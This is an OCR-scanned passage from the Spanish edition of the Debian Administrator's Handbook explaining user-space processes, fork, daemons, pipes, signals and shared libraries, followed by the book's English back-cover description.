archivo  requiere  que  el  nucleo  verifique  la  identidad  del  proceso  segtin  los  permisos  de  acce- 
so  (para  mas  detalles  sobre  este  ejemplo  particular,  revise  la  Seccion  9.3,  «Administracion  de 
permisos»  pagina  209). 

B.5.  El  espacio  de  usuario 

El  «espacio  de  usuario»  se  refiere  al  entorno  de  ejecucion  de  procesos  normales  (en  contraste 
con  el  nucleo).  Esto  no  significa  necesariamente  que  usuarios  iniciaron  realmente  estos  procesos 
debido  a  que  un  sistema  estandar  frecuentemente  posee  procesos  «demonio»  (o  en  segundo 
piano),  procesos  que  se  ejecutan  antes  que  el  usuario  inicie  una  sesion.  Los  procesos  demonio 
son  procesos  considerados  en  espacio  de  usuario. 


B.5.1.  Proceso 

Cuando  el  nucleo  supera  su  fase  de  inicializacion,  ejecuta  el  primer  proceso:  init.  El  proceso  #1 
rara  vez  es  util  por  si  mismo,  y  los  sistemas  similares  a  Unix  ejecutan  con  un  ciclo  de  vida  con 
muchos  procesos  adicionales. 

Primero  que  nada,  un  proceso  puede  clonarse  a  si  mismo  (esto  es  conocido  como  bifurcation 
—  «fork»).  El  nucleo  reserva  un  nuevo  (pero  identico)  proceso  de  espacio  en  memoria,  y  otros 
procesos  para  usarlo.  En  este  momento,  la  tinica  diferencia  entre  estos  dos  procesos  es  su  pid.  Al 
nuevo  proceso  se  le  suele  llamar  proceso  hijo  al  nuevo  proceso  y  proceso  padre  al  proceso  cuyo 
pid  no  cambio. 
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A  veces,  el  proceso  hijo  continua  su  vida  de  forma  independiente  a  su  padre,  con  sus  propios 
datos  copiados  del  proceso  padre.  En  muchos  casos,  sin  embargo,  el  proceso  hijo  ejecuta  otro 
programa.  Con  unas  pocas  excepciones,  simplemente  se  reemplaza  su  memoria  con  aquella  del 
nuevo  programa  y  comienza  la  ejecucion  del  mismo.Este  es  un  mecanismo  usado  para  el  pro¬ 
ceso  de  inicio  (con  el  numero  1  de  proceso)  para  iniciar  servicios  adicionales  y  ejecutar  toda  la 
secuencia  de  arranque.  En  algun  punto,  uno  de  los  proceso  de  la  descendencia  de  init  inicia 
una  interfaz  grafica  en  la  que  los  usuarios  pueden  iniciar  sesion  (describimos  con  mas  detalle  la 
secuencia  real  de  eventos  en  la  Section  9.1,  «Arranque  del  sistema»  pagina  194). 

Cuando  un  proceso  finaliza  la  tarea  para  la  que  fue  iniciado,  termina.  El  nucleo  recupera  la  me¬ 
moria  asignada  a  este  proceso  y  no  le  asignara  mas  divisiones  de  tiempo  de  ejecucion.  Se  le 
informa  al  proceso  padre  sobre  la  finalization  de  su  proceso  hijo,  lo  que  permite  a  un  proceso 
esperar  que  se  complete  una  tarea  que  delego  a  un  proceso  hijo.  Este  comportamiento  es  obvio 
a  simple  vista  en  los  interpretes  de  linea  de  ordenes  (conocidos  como  consolas  —  «shells»).  Cuan¬ 
do  se  ingresa  una  orden  en  una  consola,  solo  vuelve  el  prompt  cuando  finaliza  la  ejecucion  de 
dicha  orden.  La  mayori'a  de  las  consolas  permiten  ejecutar  programas  en  segundo  piano,  solo 
es  cuestion  de  agregar  un  &  al  final  de  la  orden.  Se  mostrara  el  prompt  inmediatamente,  lo  que 
puede  llevar  a  problemas  si  la  orden  necesita  mostrar  datos  por  su  cuenta. 


B.5.2.  Demonios 

Un  «demonio»  es  un  proceso  iniciado  automaticamente  por  la  secuencia  de  inicio.  Continua 
ejecutando  (en  segundo  piano)  para  realizar  tareas  de  mantenimiento  o  proveer  servicios  a  otros 
procesos.  Esta  «tarea  en  segundo  plano»  es  realmente  arbitrariay  no  tiene  un  rol  especial  desde 
el  punto  de  vista  del  sistema.  Simplemente  son  procesos,  muy  similares  a  otros  proceso,  que 
se  ejecutaran  cuando  le  corresponda  a  su  division  de  tiempo.  Esta  distincion  es  solo  para  los 
humanos:  se  dice  de  un  proceso  que  ejecuta  sin  interaction  de  un  usuario  (en  particular,  sin  una 
interfaz  grafica)  que  ejecuta  «en  segundo  plano»  o  «como  un  demonio». 


VOCABULARIO  En  ingles,  se  utiliza  el  termino  «daemon»  (en  lugar  de  «demon» )  para  hacer  re- 
Demonio  £un  termino  ferencia  a  los  demonios.  Ambos  comparten  su  etimologia  griega  pero  el  primero 
despectivo?  no  'mpl'ca  un  mal  diabolico;  en  cambio,  deberia  entenderse  como  una  especie  de 
espiritu  de  ayuda.  La  distincion  es  suficientemente  sutil  en  ingles;  es  aun  peor  en 
otros  idiomas  (como  el  espanol)  en  el  que  se  utiliza  la  misma  palabra  para  ambos 
significados. 


Describimos  en  detalle  muchos  demonios  en  el  Capitulo  9:  « Servicios  Unix»  pagina  194. 


B.5.3.  Comunicacion  entre  procesos 

Un  proceso  aislado,  sea  un  demonio  o  una  aplicacion  interactiva,  rara  vez  es  util  por  si  misma, 
razon  por  la  que  existen  varios  metodos  que  permiten  la  comunicacion  entre  dos  procesos  sepa- 
rados,  ya  sea  para  intercambiar  datos  o  para  que  se  controlen  entre  si.  El  termino  generico  para 
referirse  a  esto  es  comunicacion  entre  procesos  (abreviado  IPC:  «Inter-Process  Communication))). 
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El  sistema  IPC  mas  simple  es  utilizar  archivos.  El  proceso  que  desea  enviar  datos,  los  escribe  en 
un  archivo  (cuyo  nombre  ya  conozca),  mientras  que  el  receptor  solo  debe  abrir  este  archivo  y 
leer  su  contenido. 

En  el  caso  en  que  no  deseemos  almacenar  datos  en  el  disco,  podemos  utiliza  una  tuberia  («pi- 
pe»),  que  simplemente  es  un  objeto  con  dos  extremos;  los  bytes  escritos  en  uno  de  ellos  son 
legibles  en  el  otro.  Si  dos  procesos  separados  controlan  los  extremos,  esto  se  convierte  en  un 
canal  de  comunicacion  entre  procesos  simple  y  conveniente.  Podemos  clasificar  las  tuberias  en 
dos:  tuberias  con  nombre  y  tuberias  anonimas.  Se  representa  a  una  tuberia  con  nombre  como 
un  elemento  en  el  sistema  de  archivos  (aunque  los  datos  transmitidos  no  se  almacenen  en  el), 
para  que  ambos  procesos  puedan  abrirlo  independientemente  si  ya  conocen  la  ubicacion  de  la 
misma.  En  los  casos  en  los  que  los  procesos  que  se  comunican  estan  relacionados  (por  ejemplo, 
un  proceso  padre  y  su  hijo),  el  proceso  padre  tambien  puede  crear  una  tuberia  anonima  antes 
de  bifurcarse  que  sera  heredada  por  el  hijo.  Ambos  procesos  podran  intercambiar  datos  a  traves 
de  la  tuberia  sin  necesitar  el  sistema  de  archivos. 


EN  LA  PRACTICA  Describiremos  con  algo  de  detalle  lo  que  ocurre  cuando  se  ejecuta  en  una  consola 
Un  ejemplo  concreto  una  or<ien  compleja  (una  caneria:  «pipeline»).  Asumiremos  que  tenemos  un  proce¬ 
so  bash  (la  consola  de  usuario  estandar  en  Debian),  con  pid  4374;  en  esta  consola 
ingresaremos  la  siguiente  orden:  Is  |  sort. 

La  consola  primero  interpreta  la  orden  que  ingresamos.  En  nuestro  caso,  entiende 
que  hay  dos  programas  (Ls  y  sort),  con  un  flujo  de  datos  de  uno  al  otro  (denotado 
por  el  caracter  | ,  conocido  como  tuberia  —  «pipe»).  bash  primero  crea  una  tuberia 
sin  nombre  (que  existe  solo  dentro  del  proceso  bash  en  si). 

Luego  la  consola  se  clona  a  si  misma;  esto  Neva  a  un  nuevo  proceso  bash,  con  pid 
#4521  (los  pid  son  numeros  abstractos  y  generalmente  no  tienen  un  significado 
particular).  El  proceso  #4521  hereda  la  tuberia,  lo  que  significa  que  puede  escribir 
en  su  extremo  de  «entrada»;  bash  redirige  su  flujo  de  salida  estandar  a  la  entrada 
de  esta  tuberia.  Luego  ejecuta  (y  se  reemplaza  a  si  mismo)  con  el  programa  Is,  que 
enumera  el  contenido  del  directorio  actual.  Debido  a  que  Is  escribe  en  su  salida  es¬ 
tandar,  y  anteriormente  se  redirigio  esta  salida,  efectivamente  se  envla  su  resultado 
a  la  tuberia. 

Ocurre  una  operacion  similar  para  el  segundo  programa:  bash  se  clona  a  si  mismo 
nuevamente,  lo  que  Neva  a  un  nuevo  proceso  bash  con  pid  #4522.  Debido  a  que 
tambien  es  un  proceso  hijo  de  #4374,  tambien  hereda  la  tuberia;  luego  bash  conecta 
su  entrada  estandar  a  la  salida  de  la  tuberia  y  luego  ejecuta  (y  se  reemplaza  a  si 
mismo)  con  el  programa  sort,  que  ordena  su  entrada  y  muestra  el  resultado. 

Ahora  estan  definidas  todas  las  piezas  del  rompecabezas:  Ls  lee  el  directorio  actual 
y  escribe  la  lista  de  archivos  en  la  tuberia;  sort  lee  esta  lista,  la  ordena  alfabeti- 
camente  y  muestra  los  resultados.  Luego  finalizan  los  procesos  #4521  y  #4522,  y  el 
proceso  #4374  (que  estaba  esperando  durante  esta  operacion),  recupera  el  control 
y  muestra  el  prompt  que  permite  al  usuario  ingresar  una  nueva  orden. 


Sin  embargo,  no  toda  la  comunicacion  entre  procesos  es  para  mover  datos.  En  muchas  situacio- 
nes,  la  unica  informacion  que  se  necesita  transmitir  son  mensajes  de  control  como  «suspender 
la  ejecucion»  o  «continuar  la  ejecucion».  Unix  (y  Linux)  provee  un  mecanismo  llamado  senates, 
a  traves  de  las  que  un  proceso  puede  simplemente  enviar  una  serial  especifica  (elegida  de  una 
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lista  predefinida  de  senales)  a  otro  proceso.  El  unico  requisite  es  saber  el  pid  del  objetivo. 

Para  comunicaciones  mas  complejas  tambien  existen  mecanismos  que  le  permiten  a  un  proceso 
acceder,  o  compartir,  parte  de  la  memoria  reservada  para  otros  procesos.  La  memoria  ahora 
compartida  entre  ellos  puede  ser  usada  para  mover  dates  entre  procesos. 

Finalmente,  las  conexiones  de  red  tambien  pueden  ayudar  a  comunicar  un  proceso;  estos  proce¬ 
sos  inclusive  puede  estar  ejecutando  en  diferentes  equipos,  posiblemente  a  miles  de  kilometres 
de  distancia. 

Es  bastante  estandar  que  un  sistema  similar  a  Unix  tipico,  utilice  en  varios  niveles  estos  meca¬ 
nismos. 


B.5.4.  Bibliotecas 

Las  bibliotecas  de  funciones  tienen  un  rol  crucial  en  un  sistema  operativo  similar  a  Unix.  No 
son  programas  completos  ya  que  no  se  las  puede  ejecutar  por  su  cuenta,  sino  colecciones  de 
fragmentos  de  codigo  que  los  programas  estandar  pueden  utilizar.  Entre  las  bibliotecas  comunes 
podemos  encontrar  a: 

■  la  biblioteca  estandar  C  ( glibc ),  que  contien  funciones  basicas  como  aquellas  para  abrir 
archivos  o  conexiones  de  red  y  otras  que  facilitan  la  interaccion  con  el  nucleo; 

■  herramientas  graficas,  como  Gtk+  y  Qt,  que  permiten  que  muchos  programas  reutilicen 
los  objetos  graficos  que  proveen; 

■  la  biblioteca  libpng,  que  permite  cargar,  interpretar  y  guardar  imagenes  en  el  formate  PNG. 

Gracias  a  estas  bibliotecas,  las  aplicaciones  puede  reutilizar  codigo  existente.  El  desarrollo  de 
la  aplicacion  se  simplifica  cuando  muchas  aplicaciones  reutilizan  las  mismas  funciones.  Debido 
a  que  diferentes  personas  desarrollan  las  bibliotecas,  el  desarrollo  global  del  sistema  es  mas 
cercano  a  la  filosofia  historica  de  Unix. 


CULTURA  Uno  de  los  conceptos  fundamentales  que  subyace  en  la  familia  Unix  de  sistemas 

La  forma  Unix'  una  cosa  a  operativos  es  que  cada  herramienta  debe  hacer  solo  una  cosa,  y  hacerla  bien;  las 

la  vez  aplicaciones  luego  pueden  reutilizar  estas  herramientas  para  crear  sobre  ellas  logi- 
ca  mas  avanzada.  Se  puede  ver  esta  filosofia  en  muchas  encarnaciones.  Los  scripts 
de  consola  pueden  ser  el  mejor  ejemplo:  ensamblan  secuencias  complejas  de  he¬ 
rramientas  muy  simples  (como  grep,  wc,  sort,  uniq,  etc.).  Podemos  ver  otra  im- 
plementacion  de  esta  filosofia  en  bibliotecas  de  codigo:  la  bilioteca  tibpng  permite 
leer  y  escribir  imagenes  PNG,  con  diferentes  opciones  y  en  diferentes  formas,  pero 
solo  hace  eso;  ni  considera  incluir  funciones  que  muestren  o  editen  imagenes. 


Lo  que  es  mas,  estas  bibliotecas  generalmente  son  llamadas  «bibliotecas  compartidas»  ya  que  el 
nucleo  puede  cargarlas  en  memoria  solo  una  vez,  aun  cuando  varios  procesos  utilicen  la  misma 
biblioteca  simultaneamente.  Esto  permite  ahorrar  memoria  si  lo  comparamos  con  la  situacion 
opuesta  (e  hipotetica)  en  la  que  se  cargara  el  codigo  de  una  biblioteca  tantas  veces  como  haya 
procesos  que  la  utilizan. 
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The  Debian  Administrators  Handbook 

Debian  GNU/Linux,  a  very  popular  non -commercial  Linux  distribution,  is  known  for  its  reliability  and  richness.  Built  and  maintained 
by  an  impressive  network  of  thousands  of  developers  throughout  the  world,  the  Debian  project  is  cemented  by  its  social  contract. 
This  foundation  text  defines  the  projects  objective:  fulfilling  the  needs  of  users  with  a  100%  free  operating  system.  The  success 
of  Debian  and  of  its  ecosystem  of  derivative  distributions  (with  Ubuntu  at  the  forefront)  means  that  an  increasing  number  of 
administrators  are  exposed  to  Debian's  technologies. 

This  Debian  Administrator's  Handbook,  which  has  been  entirely  updated  for  Debian  8  ‘Jessie",  builds  on  the  success  of  its 
6  previous  editions.  Accessible  to  all,  this  book  teaches  the  essentials  to  anyone  who  wants  to  become  an  effective  and 
independent  Debian  GNU/Linux  administrator.  It  covers  all  the  topics  that  a  competent  Linux  administrator  should  master, 
from  installation  to  updating  the  system,  creating  packages  and  compiling  the  kernel,  but  also  monitoring,  backup  and 
migration,  without  forgetting  advanced  topics  such  as  setting  up  SELinux  or  AppArmor  to  secure  services,  automated 
installations,  or  virtualization  with  Xen,  KVM  or  LXC. 

This  book  is  not  only  designed  for  professional  system  administrators.  Anyone  who  uses  Debian  or  Ubuntu  on  their  own 
computer  is  de  facto  an  administrator  and  will  find  tremendous  value  in  knowing  more  about  how  their  system  works.  Being 
able  to  understand  and  resolve  problems  will  save  you  invaluable  time. 
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This  book  has  a  story.  It  started  its  life  as  a  French-language  book  (Cahier  de  lAdmin  Debian  published  by  Eyrolles) 
and  has  been  translated  into  English  thanks  to  hundreds  of  persons  who  contributed  to  a  fundraising.  Learn  more 
at  http://debian-handbook.info,  where  you  can  also  obtain  an  electronic  version  of  this  book. 
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